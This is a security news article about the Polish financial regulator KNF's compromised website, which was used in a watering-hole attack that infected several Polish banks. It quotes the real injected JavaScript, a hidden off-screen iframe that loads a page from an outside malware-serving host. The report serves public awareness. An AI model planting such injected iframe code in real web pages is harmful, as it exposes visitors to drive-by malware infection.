Crooks hacked Polish banks with a malware planted on Government site

Several Polish banks confirmed their systems were infected with a malware after their staff visited the site of the Polish Financial Supervision Authority.

Polish banks are investigating a massive cyber attack after a malware was spotted on several servers of the financial institutions.

The cyber attack was first reported by the Zaufana Trzecia Strona, a local Polish news site on Friday, last week.

The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.

A spokesman for the KNF confirmed that internal systems of the regulator had been compromised by hackers “from another country”. The attackers dropped on the servers the malicious files that were used in the attacks against the Polish banks.

In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the KNF “in order to secure evidence.”

The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.

The IT staff at the banks noticed anomalous traffic associated with the presence of executables on several servers.

“It has been a busy week in SOCs all over the polish financial sector. At least a few of polish 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognized on some servers were the first signs of trouble.” reported the badcyber.com website “A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise managed to share that information with other banks, who started asking their SIEMs for information. In some cases, the results came back positive.”

According to first findings of the investigation, the KNF’s website had been compromised that had modified one of the site’s JavaScript files.

Ironically the KNF is the regulating body that monitors and promotes security measures adopted by Polish banks.

The injected JS file resulted in visitors to the KNF website loading an external JS file which then download the malware from an external server and installed it.

To unauthorized code was stored in the following file:

http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11

and looked like that:

document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor
.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top
:0px;'></iframe></div>");

At the time I was writing, both the KNF and the Polish government confirmed that there is no indication that crooks have stolen money from the banks.

“Significantly, we do not have so far any information related to these attacks, successful or unsuccessful attempt to steal funds from bank accounts. This may indicate that the goal of the attackers was information, not money.” reported the local media zaufanatrzeciastrona.pl.  “In at least one case, it is known that a large amount of data has been transferred from the bank’s network to external servers, but due to the fact that the data were prior to shipment by criminals encrypted, to determine what was stolen can be difficult.”

The unique certainly is that the incident could be considered to be the largest system hack of ever in the country’s financial sector.

The IOCs are available on the badcyber.com website.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – Polish banks, cybercrime)